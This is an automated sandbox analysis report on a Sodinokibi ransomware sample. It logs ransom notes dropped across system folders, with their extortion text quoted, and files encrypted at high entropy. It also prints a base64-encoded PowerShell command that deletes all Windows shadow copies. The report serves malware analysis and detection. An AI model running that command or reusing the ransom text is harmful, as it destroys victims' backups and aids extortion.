        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\ProgramData\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\Recovery\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\Users\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\ProgramData\Adobe\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\ProgramData\dbg\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\ProgramData\Microsoft\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\ProgramData\Microsoft OneDrive\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Writes many files with high entropyShow sources
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\Users\Default\NTUSER.DAT.LOG1 entropy: 7.99656633962Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf entropy: 7.99742486083Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms entropy: 7.99965136218Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms entropy: 7.9996329992Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db entropy: 7.99732174792Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat entropy: 7.99963499737Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp entropy: 7.99969803071Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp entropy: 7.99970625949Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\USOShared\Logs\NotificationUxBroker.001.etl entropy: 7.99310967148Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\USOShared\Logs\NotifyIcon.011.etl entropy: 7.99603514087Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.007.etl entropy: 7.99600929381Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.008.etl entropy: 7.99128872034Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.015.etl entropy: 7.99318181537Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.016.etl entropy: 7.99092777671Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.021.etl entropy: 7.99762234173Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man entropy: 7.99961948165Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml entropy: 7.99962755606Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.excelmui.msi.16.en-us.xml entropy: 7.9952828081Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office64ww.msi.16.x-none.xml entropy: 7.99927283874Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.officemui.msi.16.en-us.xml entropy: 7.99832451919Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml entropy: 7.99790126791Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml entropy: 7.99799031793Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.outlookmui.msi.16.en-us.xml entropy: 7.99807034562Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml entropy: 7.99820717495Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.powerpointmui.msi.16.en-us.xml entropy: 7.99355492829Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.en-us.xml entropy: 7.9941039851Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.es-es.xml entropy: 7.99227189142Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.fr-fr.xml entropy: 7.99234212172Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Word.Word.x-none.msi.16.x-none.xml entropy: 7.99767709373Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.shared.Office.x-none.msi.16.x-none.xml entropy: 7.9996976551Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.wordmui.msi.16.en-us.xml entropy: 7.9976493118Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man entropy: 7.99840560253Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.man entropy: 7.99982474514Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\windows.uif_ondemand.xml.inbox entropy: 7.99983276889Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json entropy: 7.99873104138Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json entropy: 7.99705749189Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.privacy.diffbase entropy: 7.99991094238Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.privacy.json entropy: 7.99984160939Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs entropy: 7.99985625911Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Network\Downloader\edbres00002.jrs entropy: 7.99985180608Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log entropy: 7.99985241907Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\customizations.xml entropy: 7.99974524212Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\customizations.xml entropy: 7.99709445927Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log entropy: 7.99729335988Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log entropy: 7.99719387706Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs entropy: 7.99749086661Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs entropy: 7.99724488852Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log entropy: 7.99684233625Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db entropy: 7.99906630249Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml entropy: 7.9902279179Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml entropy: 7.99779185034Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml entropy: 7.99762686254Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml entropy: 7.9975256659Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml entropy: 7.99731403336Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml entropy: 7.99778743988Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml entropy: 7.99714622368Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.20 entropy: 7.9993281305Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.55 entropy: 7.99960688708Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.5B entropy: 7.99991665227Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.67 entropy: 7.99999784835Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.6C entropy: 7.99993528678Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.70 entropy: 7.99972547794Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.79 entropy: 7.99999160846Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.7C entropy: 7.99997659688Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.80 entropy: 7.99999282148Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.7E entropy: 7.99998809045Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.CE entropy: 7.99936781303Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.83 entropy: 7.9999135758Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db entropy: 7.99959133538Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.87 entropy: 7.99990990219Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.A0 entropy: 7.99998377857Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg entropy: 7.99965856165Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-05232019-141526-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99047105705Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07122018-111255-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.9909613313Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07122018-112839-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99269092072Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07122018-113538-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99471179936Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07122018-122428-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99020848604Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07172018-100840-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99451545267Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11212018-142246-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99246875976Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11222018-045846-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99032216592Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11222018-134305-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99000439307Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11222018-135121-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99060429314Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Oracle\Java\installcache\baseimagefam8 entropy: 7.99999698116Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png entropy: 7.99859625209Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png entropy: 7.99679702649Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png entropy: 7.99376876374Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png entropy: 7.99557473476Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png entropy: 7.99878851991Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png entropy: 7.99380167711Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl entropy: 7.99896469667Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db entropy: 7.99130786141Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime.xml entropy: 7.99961243297Jump to dropped file

        System Summary:

        barindex
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B93839 OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_00B93839
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B9B1B10_2_00B9B1B1
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B97D860_2_00B97D86
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B97FE40_2_00B97FE4
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B9A51C0_2_00B9A51C
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B985070_2_00B98507
        Source: classification engineClassification label: mal100.rans.evad.winEXE@5/697@0/0
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B948DE GetDriveTypeW,GetDiskFreeSpaceExW,0_2_00B948DE
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B9500F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_00B9500F
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\program files\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\356kf7c535-readme.txtJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_01
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeMutant created: \Sessions\1\BaseNamedObjects\Global\B6CC837D-86BE-A32B-F1A9-2E0B99BA279D
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\temp\356kf7c535-readme.txtJump to behavior
        Source: zA1pLzHWuQ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile read: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.iniJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: zA1pLzHWuQ.exeVirustotal: Detection: 68%
        Source: zA1pLzHWuQ.exeReversingLabs: Detection: 81%
        Source: unknownProcess created: C:\Users\user\Desktop\zA1pLzHWuQ.exe 'C:\Users\user\Desktop\zA1pLzHWuQ.exe'
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Source: unknownProcess created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
